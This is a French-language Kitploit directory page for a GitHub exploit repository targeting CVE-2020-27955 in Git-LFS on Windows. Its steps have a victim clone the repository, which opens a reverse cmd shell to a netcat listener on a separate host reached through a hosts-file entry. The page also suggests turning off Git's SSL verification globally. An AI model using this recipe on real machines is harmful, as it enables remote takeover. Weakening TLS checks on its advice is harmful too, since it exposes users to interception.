Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-27955 | Kitploit
Outils/GitHubGitHub/z50913/cve-2020-27955
Génération de PayloadsAnalyse des VulnérabilitésExploitationMouvement LatéralTests d'IntrusionCommandement et Contrôle
GitHubz50913/cve-2020-27955

CVE-2020-27955

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Reproduction de la vulnérabilité CVE-2020-27955

1、Sur la machine Windows, téléchargez la version vulnérable de Git-LFS

Lien de téléchargement : https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

2、Sur la machine Windows, installez-le, puis ajoutez les informations suivantes au fichier hosts. 10.1.1.5 est l'hôte qui écoute sur le port 8888 avec nc (vous pouvez le remplacer)

10.1.1.5 abcall.xyz

3、Sur l'hôte 10.1.1.5, démarrez nc en écoute sur le port 8888

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

4、Sur la machine Windows, saisissez dans l'invite de commandes cmd

git clone https://github.com/z50913/CVE-2020-27955.git

5、Sur 10.1.1.5, vous obtenez le shell cmd de la machine Windows

Autres

Si vous rencontrez un problème de certificat SSL, exécutez d'abord la commande suivante pour désactiver la vérification SSL, puis relancez le clone

git config --global http.sslverify false

Télécharger l’outil